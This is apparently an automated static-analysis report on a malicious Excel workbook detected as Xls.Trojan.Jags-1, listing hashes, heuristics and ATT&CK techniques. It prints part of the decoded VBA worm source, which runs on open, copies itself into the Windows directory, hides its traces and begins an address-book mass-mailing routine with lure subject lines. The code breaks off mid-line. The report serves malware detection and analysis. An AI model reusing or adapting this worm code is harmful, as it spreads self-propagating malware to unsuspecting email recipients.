Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c9024afe4facc677…

MALICIOUS

Office (OLE)

97.5 KB Created: 1999-11-25 00:52:00 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 687ec01c79a4755262e5c0e3af44a987 SHA-1: 34e84e696e9c67642c1e14562e357a378b91cdad SHA-256: c9024afe4facc67763e28c8f74cee46c4332152c03cb602f215b97b6e45c3bb3
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1204.002 Malicious File

The critical ClamAV heuristic indicates this sample is detected as 'Xls.Trojan.Jags-1'. The Workbook_Open VBA macro is designed to save the macro source to a file named 'macros.bas' in the Windows directory and then execute it. This behavior strongly suggests the intent is to download and execute a second-stage payload, a common tactic for malware.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30247 bytes
SHA-256: af3b890d293b7665a7b287d9d91c7a9789dddd182d4133b14fcc110fdfbcdff6
Detection
ClamAV: Xls.Trojan.Jags-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Initialize()
On Error Resume Next

'nuestra tecnica polimorfica
Application.ActiveWorkbook.SaveCopyAs (OBTENER_DIR_WINDOWS & "\" & UsuarioActual & ".xls")
'desactivamos para entrar
Call UNLOAD_HOTKEYS
Call Ocultar_Barra
Call ASOCIAR_JAGS90
Call Read_Your_BookAddress 'ENVIAMOS EL GUSANO
'activamos para no dejar sospecha
Call LOAD_HOTKEYS
Call Mostrar_Barra
End Sub

Private Sub Workbook_Open()
 If (Dir(OBTENER_DIR_WINDOWS & "\*.xls", vbArchive) = "") Then
   Call Initialize
 End If
 
 UserForm1.Show
End Sub

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Excel.Range)

End Sub

Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "get_win_directory"
'OBTENER EL DIRECTORIO WINDOWS
Declare Function GetWindowsDirectory Lib "Kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Function OBTENER_DIR_WINDOWS() As String
On Error Resume Next

'OBTENER DIR WINDOWS
Dim WinDir As String
Dim Cadena As String
Dim ret As Long

'OBTENEMOS EL DIR
    Cadena = String$(300, Chr$(0))
    ret = GetWindowsDirectory(Cadena, Len(Cadena))
    WinDir = Left$(Cadena, InStr(Cadena, Chr$(0)) - 1)
    
    OBTENER_DIR_WINDOWS = WinDir

End Function



Attribute VB_Name = "get_win_user"
'PARA OBTENER EL NOMBRE DE USUARIO DE WINDOWS
Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long

'OBTIENE EL NOMBRE DEL USUARIO ACTUAL DE WINDOWS

Public Function UsuarioActual() As String
    On Error Resume Next
    
    Dim sBuffer As String
    Dim lSize As Long
    Dim sUsuario As String
    
    sBuffer = Space$(260)
    lSize = Len(sBuffer)
    Call GetUserName(sBuffer, lSize)
    If lSize > 0 Then
        sUsuario = Left$(sBuffer, lSize)
        'Quitarle el CHR$(0) del final...
        lSize = InStr(sUsuario, Chr$(0))
        If lSize Then
            sUsuario = Left$(sUsuario, lSize - 1)
        End If
    Else
        sUsuario = Application.UserName
    End If
    UsuarioActual = sUsuario
End Function



Attribute VB_Name = "jags90_others"
'obtiene el nombre de la #$#%# base de datos


Function aleatorio(hasta As Integer) As Long
Dim x, num
num = 0

  For x = 1 To hasta
    Randomize
    num = num + Rnd()
  Next x
  
  aleatorio = num
End Function

Function PolyName() As String
 Dim texto, x, hasta
 hasta = aleatorio(12) + 1
 texto = "                   "
 
 For x = 1 To hasta
   Mid$(texto, x, 1) = Chr(aleatorio(23) + 64)
 Next x
 
 PolyName = texto
End Function


Attribute VB_Name = "read_address_book"

Private Function PolyBody() As String
Dim op
op = aleatorio(1)
If (op = 0) Then
  PolyBody = ""
Else
  op = aleatorio(9)
  Select Case op
    Case Is = 0
        PolyBody = "A Greeting Card of: "
    Case Is = 1
        PolyBody = "Animated Card's "
    Case Is = 2
        PolyBody = "Top Secret FBI Information "
    Case Is = 3
        PolyBody = "HEEEEELP ME..!  "
    Case Is = 4
        PolyBody = "FEEDBACK Informatio
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.